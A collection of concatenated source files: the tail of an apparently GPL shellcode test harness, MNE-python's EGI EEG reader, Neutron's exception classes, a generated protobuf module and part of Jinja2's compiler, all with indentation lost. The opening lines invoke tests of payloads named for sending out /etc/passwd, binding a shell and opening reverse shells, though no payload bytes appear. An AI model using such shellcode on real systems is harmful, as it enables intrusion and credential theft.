fd_chains.print_report()
# Globals
fd_chains = LogChain()
id_gen = IdGenerator()
if __name__ == '__main__':
test_i386(X86_SEND_ETCPASSWD)
test_i386(X86_BIND_TCP)
test_i386(X86_REVERSE_TCP)
test_i386(X86_REVERSE_TCP_2)
| gpl-2.0 |
andyh616/mne-python | mne/io/egi/egi.py | 5 | 13219 | # Authors: Denis A. Engemann <denis.engemann@gmail.com>
# Teon Brooks <teon.brooks@gmail.com>
#
# simplified BSD-3 license
import datetime
import time
import warnings
import numpy as np
from ..base import _BaseRaw, _check_update_montage
from ..meas_info import _empty_info
from ..constants import FIFF
from ...utils import verbose, logger
def _read_header(fid):
"""Read EGI binary header"""
version = np.fromfile(fid, np.int32, 1)[0]
if version > 6 & ~np.bitwise_and(version, 6):
version = version.byteswap().astype(np.uint32)
else:
ValueError('Watchout. This does not seem to be a simple '
'binary EGI file.')
def my_fread(*x, **y):
return np.fromfile(*x, **y)[0]
info = dict(
version=version,
year=my_fread(fid, '>i2', 1),
month=my_fread(fid, '>i2', 1),
day=my_fread(fid, '>i2', 1),
hour=my_fread(fid, '>i2', 1),
minute=my_fread(fid, '>i2', 1),
second=my_fread(fid, '>i2', 1),
millisecond=my_fread(fid, '>i4', 1),
samp_rate=my_fread(fid, '>i2', 1),
n_channels=my_fread(fid, '>i2', 1),
gain=my_fread(fid, '>i2', 1),
bits=my_fread(fid, '>i2', 1),
value_range=my_fread(fid, '>i2', 1)
)
unsegmented = 1 if np.bitwise_and(version, 1) == 0 else 0
precision = np.bitwise_and(version, 6)
if precision == 0:
RuntimeError('Floating point precision is undefined.')
if unsegmented:
info.update(dict(n_categories=0,
n_segments=1,
n_samples=np.fromfile(fid, '>i4', 1)[0],
n_events=np.fromfile(fid, '>i2', 1)[0],
event_codes=[],
category_names=[],
category_lengths=[],
pre_baseline=0))
for event in range(info['n_events']):
event_codes = ''.join(np.fromfile(fid, 'S1', 4).astype('U1'))
info['event_codes'].append(event_codes)
info['event_codes'] = np.array(info['event_codes'])
else:
raise NotImplementedError('Only continous files are supported')
info.update(dict(precision=precision, unsegmented=unsegmented))
return info
def _read_events(fid, info):
"""Read events"""
unpack = [info[k] for k in ['n_events', 'n_segments', 'n_channels']]
n_events, n_segments, n_channels = unpack
n_samples = 1 if info['unsegmented'] else info['n_samples']
events = np.zeros([n_events, n_segments * info['n_samples']])
dtype, bytesize = {2: ('>i2', 2), 4: ('>f4', 4),
6: ('>f8', 8)}[info['precision']]
info.update({'dtype': dtype, 'bytesize': bytesize})
beg_dat = fid.tell()
for ii in range(info['n_events']):
fid.seek(beg_dat + (int(n_channels) + ii) * bytesize, 0)
events[ii] = np.fromfile(fid, dtype, n_samples)
fid.seek(int((n_channels + n_events) * bytesize), 1)
return events
def _read_data(fid, info):
"""Aux function"""
if not info['unsegmented']:
raise NotImplementedError('Only continous files are supported')
fid.seek(36 + info['n_events'] * 4, 0) # skip header
readsize = (info['n_channels'] + info['n_events']) * info['n_samples']
final_shape = (info['n_samples'], info['n_channels'] + info['n_events'])
data = np.fromfile(fid, info['dtype'], readsize).reshape(final_shape).T
return data
def _combine_triggers(data, remapping=None):
"""Combine binary triggers"""
new_trigger = np.zeros(data[0].shape)
first = np.nonzero(data[0])[0]
for d in data[1:]:
if np.intersect1d(d.nonzero()[0], first).any():
raise RuntimeError('Events must be mutually exclusive')
if remapping is None:
remapping = np.arange(data) + 1
for d, event_id in zip(data, remapping):
idx = d.nonzero()
if np.any(idx):
new_trigger[idx] += event_id
return new_trigger[None]
@verbose
def read_raw_egi(input_fname, montage=None, eog=None, misc=None,
include=None, exclude=None, verbose=None):
"""Read EGI simple binary as raw object
Note. The trigger channel names are based on the
arbitrary user dependent event codes used. However this
function will attempt to generate a synthetic trigger channel
named ``STI 014`` in accordance with the general Neuromag / MNE
naming pattern.
The event_id assignment equals np.arange(n_events - n_excluded) + 1.
The resulting `event_id` mapping is stored as attribute to
the resulting raw object but will be ignored when saving to a fiff.
Note. The trigger channel is artificially constructed based on
timestamps received by the Netstation. As a consequence, triggers
have only short durations.
This step will fail if events are not mutually exclusive.
Parameters
----------
input_fname : str
Path to the raw file.
montage : str | None | instance of montage
Path or instance of montage containing electrode positions.
If None, sensor locations are (0,0,0). See the documentation of
:func:`mne.channels.read_montage` for more information.
eog : list or tuple
Names of channels or list of indices that should be designated
EOG channels. Default is None.
misc : list or tuple
Names of channels or list of indices that should be designated
MISC channels. Default is None.
include : None | list
The event channels to be ignored when creating the synthetic
trigger. Defaults to None.
Note. Overrides `exclude` parameter.
exclude : None | list
The event channels to be ignored when creating the synthetic
trigger. Defaults to None. If None, channels that have more than
one event and the ``sync`` and ``TREV`` channels will be
ignored.
verbose : bool, str, int, or None
If not None, override default verbose level (see mne.verbose).
Returns
-------
raw : Instance of RawEGI
A Raw object containing EGI data.
See Also
--------
mne.io.Raw : Documentation of attribute and methods.
"""
return RawEGI(input_fname, montage, eog, misc, include, exclude, verbose)
class RawEGI(_BaseRaw):
"""Raw object from EGI simple binary file
"""
@verbose
def __init__(self, input_fname, montage=None, eog=None, misc=None,
include=None, exclude=None, verbose=None):
"""docstring for __init__"""
if eog is None:
eog = []
if misc is None:
misc = []
with open(input_fname, 'rb') as fid: # 'rb' important for py3k
logger.info('Reading EGI header from %s...' % input_fname)
egi_info = _read_header(fid)
logger.info(' Reading events ...')
_read_events(fid, egi_info) # update info + jump
logger.info(' Reading data ...')
# reads events as well
data = _read_data(fid, egi_info).astype(np.float64)
if egi_info['value_range'] != 0 and egi_info['bits'] != 0:
cal = egi_info['value_range'] / 2 ** egi_info['bits']
else:
cal = 1e-6
data[:egi_info['n_channels']] = data[:egi_info['n_channels']] * cal
logger.info(' Assembling measurement info ...')
if egi_info['n_events'] > 0:
event_codes = list(egi_info['event_codes'])
egi_events = data[-egi_info['n_events']:]
if include is None:
exclude_list = ['sync', 'TREV'] if exclude is None else exclude
exclude_inds = [i for i, k in enumerate(event_codes) if k in
exclude_list]
more_excludes = []
if exclude is None:
for ii, event in enumerate(egi_events):
if event.sum() <= 1 and event_codes[ii]:
more_excludes.append(ii)
if len(exclude_inds) + len(more_excludes) == len(event_codes):
warnings.warn('Did not find any event code with more '
'than one event.', RuntimeWarning)
else:
exclude_inds.extend(more_excludes)
exclude_inds.sort()
include_ = [i for i in np.arange(egi_info['n_events']) if
i not in exclude_inds]
include_names = [k for i, k in enumerate(event_codes)
if i in include_]
else:
include_ = [i for i, k in enumerate(event_codes)
if k in include]
include_names = include
for kk, v in [('include', include_names), ('exclude', exclude)]:
if isinstance(v, list):
for k in v:
if k not in event_codes:
raise ValueError('Could find event named "%s"' % k)
elif v is not None:
raise ValueError('`%s` must be None or of type list' % kk)
event_ids = np.arange(len(include_)) + 1
try:
logger.info(' Synthesizing trigger channel "STI 014" ...')
logger.info(' Excluding events {%s} ...' %
", ".join([k for i, k in enumerate(event_codes)
if i not in include_]))
new_trigger = _combine_triggers(egi_events[include_],
remapping=event_ids)
data = np.concatenate([data, new_trigger])
except RuntimeError:
logger.info(' Found multiple events at the same time '
'sample. Could not create trigger channel.')
new_trigger = None
self.event_id = dict(zip([e for e in event_codes if e in
include_names], event_ids))
else:
# No events
self.event_id = None
new_trigger = None
info = _empty_info()
info['hpi_subsystem'] = None
info['events'], info['hpi_results'], info['hpi_meas'] = [], [], []
info['sfreq'] = float(egi_info['samp_rate'])
info['filename'] = input_fname
my_time = datetime.datetime(
egi_info['year'],
egi_info['month'],
egi_info['day'],
egi_info['hour'],
egi_info['minute'],
egi_info['second']
)
my_timestamp = time.mktime(my_time.timetuple())
info['meas_date'] = np.array([my_timestamp], dtype=np.float32)
info['projs'] = []
ch_names = ['EEG %03d' % (i + 1) for i in
range(egi_info['n_channels'])]
ch_names.extend(list(egi_info['event_codes']))
if new_trigger is not None:
ch_names.append('STI 014') # our new_trigger
info['nchan'] = nchan = len(data)
info['chs'] = []
info['ch_names'] = ch_names
info['bads'] = []
info['comps'] = []
info['custom_ref_applied'] = False
for ii, ch_name in enumerate(ch_names):
ch_info = {'cal': cal,
'logno': ii + 1,
'scanno': ii + 1,
'range': 1.0,
'unit_mul': 0,
'ch_name': ch_name,
'unit': FIFF.FIFF_UNIT_V,
'coord_frame': FIFF.FIFFV_COORD_HEAD,
'coil_type': FIFF.FIFFV_COIL_EEG,
'kind': FIFF.FIFFV_EEG_CH,
'eeg_loc': None,
'loc': np.array([0, 0, 0, 1] * 3, dtype='f4')}
if ch_name in eog or ii in eog or ii - nchan in eog:
ch_info['coil_type'] = FIFF.FIFFV_COIL_NONE
ch_info['kind'] = FIFF.FIFFV_EOG_CH
if ch_name in misc or ii in misc or ii - nchan in misc:
ch_info['coil_type'] = FIFF.FIFFV_COIL_NONE
ch_info['kind'] = FIFF.FIFFV_MISC_CH
if len(ch_name) == 4 or ch_name.startswith('STI'):
u = {'unit_mul': 0,
'cal': 1,
'coil_type': FIFF.FIFFV_COIL_NONE,
'unit': FIFF.FIFF_UNIT_NONE,
'kind': FIFF.FIFFV_STIM_CH}
ch_info.update(u)
info['chs'].append(ch_info)
_check_update_montage(info, montage)
orig_format = {'>f2': 'single', '>f4': 'double',
'>i2': 'int'}[egi_info['dtype']]
super(RawEGI, self).__init__(
info, data, filenames=[input_fname], orig_format=orig_format,
verbose=verbose)
logger.info(' Range : %d ... %d = %9.3f ... %9.3f secs'
% (self.first_samp, self.last_samp,
float(self.first_samp) / self.info['sfreq'],
float(self.last_samp) / self.info['sfreq']))
# use information from egi
logger.info('Ready.')
| bsd-3-clause |
asgard-lab/neutron | neutron/common/exceptions.py | 12 | 15936 | # Copyright 2011 VMware, Inc
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Neutron base exception handling.
"""
from oslo_utils import excutils
import six
class NeutronException(Exception):
"""Base Neutron Exception.
To correctly use this class, inherit from it and define
a 'message' property. That message will get printf'd
with the keyword arguments provided to the constructor.
"""
message = _("An unknown exception occurred.")
def __init__(self, **kwargs):
try:
super(NeutronException, self).__init__(self.message % kwargs)
self.msg = self.message % kwargs
except Exception:
with excutils.save_and_reraise_exception() as ctxt:
if not self.use_fatal_exceptions():
ctxt.reraise = False
# at least get the core message out if something happened
super(NeutronException, self).__init__(self.message)
if six.PY2:
def __unicode__(self):
return unicode(self.msg)
def __str__(self):
return self.msg
def use_fatal_exceptions(self):
return False
class BadRequest(NeutronException):
message = _('Bad %(resource)s request: %(msg)s')
class NotFound(NeutronException):
pass
class Conflict(NeutronException):
pass
class NotAuthorized(NeutronException):
message = _("Not authorized.")
class ServiceUnavailable(NeutronException):
message = _("The service is unavailable")
class NotSupported(NeutronException):
message = _('Not supported: %(msg)s')
class AdminRequired(NotAuthorized):
message = _("User does not have admin privileges: %(reason)s")
class ObjectNotFound(NotFound):
message = _("Object %(id)s not found.")
class NetworkNotFound(NotFound):
message = _("Network %(net_id)s could not be found")
class SubnetNotFound(NotFound):
message = _("Subnet %(subnet_id)s could not be found")
class SubnetPoolNotFound(NotFound):
message = _("Subnet pool %(subnetpool_id)s could not be found")
class PortNotFound(NotFound):
message = _("Port %(port_id)s could not be found")
class QosPolicyNotFound(NotFound):
message = _("QoS policy %(policy_id)s could not be found")
class QosRuleNotFound(NotFound):
message = _("QoS rule %(rule_id)s for policy %(policy_id)s "
"could not be found")
class PortNotFoundOnNetwork(NotFound):
message = _("Port %(port_id)s could not be found "
"on network %(net_id)s")
class PortQosBindingNotFound(NotFound):
message = _("QoS binding for port %(port_id)s and policy %(policy_id)s "
"could not be found")
class NetworkQosBindingNotFound(NotFound):
message = _("QoS binding for network %(net_id)s and policy %(policy_id)s "
"could not be found")
class PolicyFileNotFound(NotFound):
message = _("Policy configuration policy.json could not be found")
class PolicyInitError(NeutronException):
message = _("Failed to init policy %(policy)s because %(reason)s")
class PolicyCheckError(NeutronException):
message = _("Failed to check policy %(policy)s because %(reason)s")
class StateInvalid(BadRequest):
message = _("Unsupported port state: %(port_state)s")
class InUse(NeutronException):
message = _("The resource is inuse")
class QosPolicyInUse(InUse):
message = _("QoS Policy %(policy_id)s is used by "
"%(object_type)s %(object_id)s.")
class NetworkInUse(InUse):
message = _("Unable to complete operation on network %(net_id)s. "
"There are one or more ports still in use on the network.")
class SubnetInUse(InUse):
message = _("Unable to complete operation on subnet %(subnet_id)s. "
"%(reason)s")
def __init__(self, **kwargs):
if 'reason' not in kwargs:
kwargs['reason'] = _("One or more ports have an IP allocation "
"from this subnet.")
super(SubnetInUse, self).__init__(**kwargs)
class PortInUse(InUse):
message = _("Unable to complete operation on port %(port_id)s "
"for network %(net_id)s. Port already has an attached "
"device %(device_id)s.")
class ServicePortInUse(InUse):
message = _("Port %(port_id)s cannot be deleted directly via the "
"port API: %(reason)s")
class PortBound(InUse):
message = _("Unable to complete operation on port %(port_id)s, "
"port is already bound, port type: %(vif_type)s, "
"old_mac %(old_mac)s, new_mac %(new_mac)s")
class MacAddressInUse(InUse):
message = _("Unable to complete operation for network %(net_id)s. "
"The mac address %(mac)s is in use.")
class HostRoutesExhausted(BadRequest):
# NOTE(xchenum): probably make sense to use quota exceeded exception?
message = _("Unable to complete operation for %(subnet_id)s. "
"The number of host routes exceeds the limit %(quota)s.")
class DNSNameServersExhausted(BadRequest):
# NOTE(xchenum): probably make sense to use quota exceeded exception?
message = _("Unable to complete operation for %(subnet_id)s. "
"The number of DNS nameservers exceeds the limit %(quota)s.")
class InvalidIpForNetwork(BadRequest):
message = _("IP address %(ip_address)s is not a valid IP "
"for any of the subnets on the specified network.")
class InvalidIpForSubnet(BadRequest):
message = _("IP address %(ip_address)s is not a valid IP "
"for the specified subnet.")
class IpAddressInUse(InUse):
message = _("Unable to complete operation for network %(net_id)s. "
"The IP address %(ip_address)s is in use.")
class VlanIdInUse(InUse):
message = _("Unable to create the network. "
"The VLAN %(vlan_id)s on physical network "
"%(physical_network)s is in use.")
class FlatNetworkInUse(InUse):
message = _("Unable to create the flat network. "
"Physical network %(physical_network)s is in use.")
class TunnelIdInUse(InUse):
message = _("Unable to create the network. "
"The tunnel ID %(tunnel_id)s is in use.")
class TenantNetworksDisabled(ServiceUnavailable):
message = _("Tenant network creation is not enabled.")
class ResourceExhausted(ServiceUnavailable):
pass
class NoNetworkAvailable(ResourceExhausted):
message = _("Unable to create the network. "
"No tenant network is available for allocation.")
class NoNetworkFoundInMaximumAllowedAttempts(ServiceUnavailable):
message = _("Unable to create the network. "
"No available network found in maximum allowed attempts.")
class SubnetMismatchForPort(BadRequest):
message = _("Subnet on port %(port_id)s does not match "
"the requested subnet %(subnet_id)s")
class MalformedRequestBody(BadRequest):
message = _("Malformed request body: %(reason)s")
class Invalid(NeutronException):
def __init__(self, message=None):
self.message = message
super(Invalid, self).__init__()
class InvalidInput(BadRequest):
message = _("Invalid input for operation: %(error_message)s.")
class InvalidAllocationPool(BadRequest):
message = _("The allocation pool %(pool)s is not valid.")
class UnsupportedPortDeviceOwner(Conflict):
message = _("Operation %(op)s is not supported for device_owner "
"%(device_owner)s on port %(port_id)s.")
class OverlappingAllocationPools(Conflict):
message = _("Found overlapping allocation pools: "
"%(pool_1)s %(pool_2)s for subnet %(subnet_cidr)s.")
class OutOfBoundsAllocationPool(BadRequest):
message = _("The allocation pool %(pool)s spans "
"beyond the subnet cidr %(subnet_cidr)s.")
class MacAddressGenerationFailure(ServiceUnavailable):
message = _("Unable to generate unique mac on network %(net_id)s.")
class IpAddressGenerationFailure(Conflict):
message = _("No more IP addresses available on network %(net_id)s.")
class BridgeDoesNotExist(NeutronException):
message = _("Bridge %(bridge)s does not exist.")
class PreexistingDeviceFailure(NeutronException):
message = _("Creation failed. %(dev_name)s already exists.")
class QuotaResourceUnknown(NotFound):
message = _("Unknown quota resources %(unknown)s.")
class OverQuota(Conflict):
message = _("Quota exceeded for resources: %(overs)s")
class QuotaMissingTenant(BadRequest):
message = _("Tenant-id was missing from Quota request")
class InvalidQuotaValue(Conflict):
message = _("Change would make usage less than 0 for the following "
"resources: %(unders)s")
class InvalidSharedSetting(Conflict):
message = _("Unable to reconfigure sharing settings for network "
"%(network)s. Multiple tenants are using it")
class InvalidExtensionEnv(BadRequest):
message = _("Invalid extension environment: %(reason)s")
class ExtensionsNotFound(NotFound):
message = _("Extensions not found: %(extensions)s")
class InvalidContentType(NeutronException):
message = _("Invalid content type %(content_type)s")
class ExternalIpAddressExhausted(BadRequest):
message = _("Unable to find any IP address on external "
"network %(net_id)s.")
class TooManyExternalNetworks(NeutronException):
message = _("More than one external network exists")
class InvalidConfigurationOption(NeutronException):
message = _("An invalid value was provided for %(opt_name)s: "
"%(opt_value)s")
class GatewayConflictWithAllocationPools(InUse):
message = _("Gateway ip %(ip_address)s conflicts with "
"allocation pool %(pool)s")
class GatewayIpInUse(InUse):
message = _("Current gateway ip %(ip_address)s already in use "
"by port %(port_id)s. Unable to update.")
class NetworkVlanRangeError(NeutronException):
message = _("Invalid network VLAN range: '%(vlan_range)s' - '%(error)s'")
def __init__(self, **kwargs):
# Convert vlan_range tuple to 'start:end' format for display
if isinstance(kwargs['vlan_range'], tuple):
kwargs['vlan_range'] = "%d:%d" % kwargs['vlan_range']
super(NetworkVlanRangeError, self).__init__(**kwargs)
class PhysicalNetworkNameError(NeutronException):
message = _("Empty physical network name.")
class NetworkTunnelRangeError(NeutronException):
message = _("Invalid network Tunnel range: "
"'%(tunnel_range)s' - %(error)s")
def __init__(self, **kwargs):
# Convert tunnel_range tuple to 'start:end' format for display
if isinstance(kwargs['tunnel_range'], tuple):
kwargs['tunnel_range'] = "%d:%d" % kwargs['tunnel_range']
super(NetworkTunnelRangeError, self).__init__(**kwargs)
class NetworkVxlanPortRangeError(NeutronException):
message = _("Invalid network VXLAN port range: '%(vxlan_range)s'")
class VxlanNetworkUnsupported(NeutronException):
message = _("VXLAN Network unsupported.")
class DuplicatedExtension(NeutronException):
message = _("Found duplicate extension: %(alias)s")
class DeviceIDNotOwnedByTenant(Conflict):
message = _("The following device_id %(device_id)s is not owned by your "
"tenant or matches another tenants router.")
class InvalidCIDR(BadRequest):
message = _("Invalid CIDR %(input)s given as IP prefix")
class RouterNotCompatibleWithAgent(NeutronException):
message = _("Router '%(router_id)s' is not compatible with this agent")
class DvrHaRouterNotSupported(NeutronException):
message = _("Router '%(router_id)s' cannot be both DVR and HA")
class FailToDropPrivilegesExit(SystemExit):
"""Exit exception raised when a drop privileges action fails."""
code = 99
class FloatingIpSetupException(NeutronException):
def __init__(self, message=None):
self.message = message
super(FloatingIpSetupException, self).__init__()
class IpTablesApplyException(NeutronException):
def __init__(self, message=None):
self.message = message
super(IpTablesApplyException, self).__init__()
class NetworkIdOrRouterIdRequiredError(NeutronException):
message = _('network_id and router_id are None. One must be provided.')
class AbortSyncRouters(NeutronException):
message = _("Aborting periodic_sync_routers_task due to an error")
# Shared *aas exceptions, pending them being refactored out of Neutron
# proper.
class FirewallInternalDriverError(NeutronException):
"""Fwaas exception for all driver errors.
On any failure or exception in the driver, driver should log it and
raise this exception to the agent
"""
message = _("%(driver)s: Internal driver error.")
class MissingMinSubnetPoolPrefix(BadRequest):
message = _("Unspecified minimum subnet pool prefix")
class EmptySubnetPoolPrefixList(BadRequest):
message = _("Empty subnet pool prefix list")
class PrefixVersionMismatch(BadRequest):
message = _("Cannot mix IPv4 and IPv6 prefixes in a subnet pool")
class UnsupportedMinSubnetPoolPrefix(BadRequest):
message = _("Prefix '%(prefix)s' not supported in IPv%(version)s pool")
class IllegalSubnetPoolPrefixBounds(BadRequest):
message = _("Illegal prefix bounds: %(prefix_type)s=%(prefixlen)s, "
"%(base_prefix_type)s=%(base_prefixlen)s")
class IllegalSubnetPoolPrefixUpdate(BadRequest):
message = _("Illegal update to prefixes: %(msg)s")
class SubnetAllocationError(NeutronException):
message = _("Failed to allocate subnet: %(reason)s")
class AddressScopePrefixConflict(Conflict):
message = _("Failed to associate address scope: subnetpools "
"within an address scope must have unique prefixes")
class IllegalSubnetPoolAssociationToAddressScope(BadRequest):
message = _("Illegal subnetpool association: subnetpool %(subnetpool_id)s "
" cannot be associated with address scope"
" %(address_scope_id)s")
class IllegalSubnetPoolUpdate(BadRequest):
message = _("Illegal subnetpool update : %(reason)s")
class MinPrefixSubnetAllocationError(BadRequest):
message = _("Unable to allocate subnet with prefix length %(prefixlen)s, "
"minimum allowed prefix is %(min_prefixlen)s")
class MaxPrefixSubnetAllocationError(BadRequest):
message = _("Unable to allocate subnet with prefix length %(prefixlen)s, "
"maximum allowed prefix is %(max_prefixlen)s")
class SubnetPoolDeleteError(BadRequest):
message = _("Unable to delete subnet pool: %(reason)s")
class SubnetPoolQuotaExceeded(OverQuota):
message = _("Per-tenant subnet pool prefix quota exceeded")
class DeviceNotFoundError(NeutronException):
message = _("Device '%(device_name)s' does not exist")
class NetworkSubnetPoolAffinityError(BadRequest):
message = _("Subnets hosted on the same network must be allocated from "
"the same subnet pool")
class ObjectActionError(NeutronException):
message = _('Object action %(action)s failed because: %(reason)s')
class CTZoneExhaustedError(NeutronException):
message = _("IPtables conntrack zones exhausted, iptables rules cannot "
"be applied.")
| apache-2.0 |
axbaretto/beam | sdks/python/.tox/py27gcp/lib/python2.7/site-packages/google/api/httpbody_pb2.py | 17 | 2535 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/api/httpbody.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/api/httpbody.proto',
package='google.api',
syntax='proto3',
serialized_pb=_b('\n\x19google/api/httpbody.proto\x12\ngoogle.api\".\n\x08HttpBody\x12\x14\n\x0c\x63ontent_type\x18\x01 \x01(\t\x12\x0c\n\x04\x64\x61ta\x18\x02 \x01(\x0c\x42(\n\x0e\x63om.google.apiB\rHttpBodyProtoP\x01\xa2\x02\x04GAPIb\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_HTTPBODY = _descriptor.Descriptor(
name='HttpBody',
full_name='google.api.HttpBody',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='content_type', full_name='google.api.HttpBody.content_type', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='data', full_name='google.api.HttpBody.data', index=1,
number=2, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=41,
serialized_end=87,
)
DESCRIPTOR.message_types_by_name['HttpBody'] = _HTTPBODY
HttpBody = _reflection.GeneratedProtocolMessageType('HttpBody', (_message.Message,), dict(
DESCRIPTOR = _HTTPBODY,
__module__ = 'google.api.httpbody_pb2'
# @@protoc_insertion_point(class_scope:google.api.HttpBody)
))
_sym_db.RegisterMessage(HttpBody)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('\n\016com.google.apiB\rHttpBodyProtoP\001\242\002\004GAPI'))
# @@protoc_insertion_point(module_scope)
| apache-2.0 |
illicitonion/givabit | lib/sdks/google_appengine_1.7.1/google_appengine/lib/jinja2/jinja2/compiler.py | 121 | 61899 | # -*- coding: utf-8 -*-
"""
jinja2.compiler
~~~~~~~~~~~~~~~
Compiles nodes into python code.
:copyright: (c) 2010 by the Jinja Team.
:license: BSD, see LICENSE for more details.
"""
from cStringIO import StringIO
from itertools import chain
from copy import deepcopy
from jinja2 import nodes
from jinja2.nodes import EvalContext
from jinja2.visitor import NodeVisitor
from jinja2.exceptions import TemplateAssertionError
from jinja2.utils import Markup, concat, escape, is_python_keyword, next
operators = {
'eq': '==',
'ne': '!=',
'gt': '>',
'gteq': '>=',
'lt': '<',
'lteq': '<=',
'in': 'in',
'notin': 'not in'
}
try:
exec '(0 if 0 else 0)'
except SyntaxError:
have_condexpr = False
else:
have_condexpr = True
# what method to iterate over items do we want to use for dict iteration
# in generated code? on 2.x let's go with iteritems, on 3.x with items
if hasattr(dict, 'iteritems'):
dict_item_iter = 'iteritems'
else:
dict_item_iter = 'items'
# does if 0: dummy(x) get us x into the scope?
def unoptimize_before_dead_code():
x = 42
def f():
if 0: dummy(x)
return f
unoptimize_before_dead_code = bool(unoptimize_before_dead_code().func_closure)
def generate(node, environment, name, filename, stream=None,
defer_init=False):
"""Generate the python source for a node tree."""
if not isinstance(node, nodes.Template):
raise TypeError('Can\'t compile non template nodes')
generator = CodeGenerator(environment, name, filename, stream, defer_init)
generator.visit(node)
if stream is None:
return generator.stream.getvalue()
def has_safe_repr(value):
"""Does the node have a safe representation?"""
if value is None or value is NotImplemented or value is Ellipsis:
return True
if isinstance(value, (bool, int, long, float, complex, basestring,
xrange, Markup)):
return True
if isinstance(value, (tuple, list, set, frozenset)):
for item in value:
if not has_safe_repr(item):
return False
return True
elif isinstance(value, dict):
for key, value in value.iteritems():
if not has_safe_repr(key):
return False
if not has_safe_repr(value):
return False
return True
return False
def find_undeclared(nodes, names):
"""Check if the names passed are accessed undeclared. The return value
is a set of all the undeclared names from the sequence of names found.
"""
visitor = UndeclaredNameVisitor(names)
try:
for node in nodes:
visitor.visit(node)
except VisitorExit:
pass
return visitor.undeclared
class Identifiers(object):
"""Tracks the status of identifiers in frames."""
def __init__(self):
# variables that are known to be declared (probably from outer
# frames or because they are special for the frame)
self.declared = set()
# undeclared variables from outer scopes
self.outer_undeclared = set()
# names that are accessed without being explicitly declared by
# this one or any of the outer scopes. Names can appear both in
# declared and undeclared.
self.undeclared = set()
# names that are declared locally
self.declared_locally = set()
# names that are declared by parameters
self.declared_parameter = set()
def add_special(self, name):
"""Register a special name like `loop`."""
self.undeclared.discard(name)
self.declared.add(name)
def is_declared(self, name):
"""Check if a name is declared in this or an outer scope."""
if name in self.declared_locally or name in self.declared_parameter:
return True
return name in self.declared
def copy(self):
return deepcopy(self)
class Frame(object):
"""Holds compile time information for us."""
def __init__(self, eval_ctx, parent=None):
self.eval_ctx = eval_ctx
self.identifiers = Identifiers()
# a toplevel frame is the root + soft frames such as if conditions.
self.toplevel = False
# the root frame is basically just the outermost frame, so no if
# conditions. This information is used to optimize inheritance
# situations.
self.rootlevel = False
# in some dynamic inheritance situations the compiler needs to add
# write tests around output statements.
self.require_output_check = parent and parent.require_output_check
# inside some tags we are using a buffer rather than yield statements.
# this for example affects {% filter %} or {% macro %}. If a frame
# is buffered this variable points to the name of the list used as
# buffer.
self.buffer = None
# the name of the block we're in, otherwise None.
self.block = parent and parent.block or None
# a set of actually assigned names
self.assigned_names = set()
# the parent of this frame
self.parent = parent
if parent is not None:
self.identifiers.declared.update(
parent.identifiers.declared |
parent.identifiers.declared_parameter |
parent.assigned_names
)
self.identifiers.outer_undeclared.update(
parent.identifiers.undeclared -
self.identifiers.declared
)
self.buffer = parent.buffer
def copy(self):
"""Create a copy of the current one."""
rv = object.__new__(self.__class__)
rv.__dict__.update(self.__dict__)
rv.identifiers = object.__new__(self.identifiers.__class__)
rv.identifiers.__dict__.update(self.identifiers.__dict__)
return rv
def inspect(self, nodes):
"""Walk the node and check for identifiers. If the scope is hard (eg:
enforce on a python level) overrides from outer scopes are tracked
differently.
"""
visitor = FrameIdentifierVisitor(self.identifiers)
for node in nodes:
visitor.visit(node)
def find_shadowed(self, extra=()):
"""Find all the shadowed names. extra is an iterable of variables
that may be defined with `add_special` which may occour scoped.
"""
i = self.identifiers
return (i.declared | i.outer_undeclared) & \
(i.declared_locally | i.declared_parameter) | \
set(x for x in extra if i.is_declared(x))
def inner(self):
"""Return an inner frame."""
return Frame(self.eval_ctx, self)
def soft(self):
"""Return a soft frame. A soft frame may not be modified as
standalone thing as it shares the resources with the frame it
was created of, but it's not a rootlevel frame any longer.
"""
rv = self.copy()
rv.rootlevel = False
return rv
__copy__ = copy
class VisitorExit(RuntimeError):
"""Exception used by the `UndeclaredNameVisitor` to signal a stop."""
class DependencyFinderVisitor(NodeVisitor):
"""A visitor that collects filter and test calls."""
def __init__(self):
self.filters = set()
self.tests = set()
def visit_Filter(self, node):
self.generic_visit(node)
self.filters.add(node.name)
def visit_Test(self, node):
self.generic_visit(node)
self.tests.add(node.name)
def visit_Block(self, node):
"""Stop visiting at blocks."""
class UndeclaredNameVisitor(NodeVisitor):
"""A visitor that checks if a name is accessed without being
declared. This is different from the frame visitor as it will
not stop at closure frames.
"""
def __init__(self, names):
self.names = set(names)
self.undeclared = set()
def visit_Name(self, node):
if node.ctx == 'load' and node.name in self.names:
self.undeclared.add(node.name)
if self.undeclared == self.names:
raise VisitorExit()
else:
self.names.discard(node.name)
def visit_Block(self, node):
"""Stop visiting a blocks."""
class FrameIdentifierVisitor(NodeVisitor):
"""A visitor for `Frame.inspect`."""
def __init__(self, identifiers):
self.identifiers = identifiers
def visit_Name(self, node):
"""All assignments to names go through this function."""
if node.ctx == 'store':
self.identifiers.declared_locally.add(node.name)
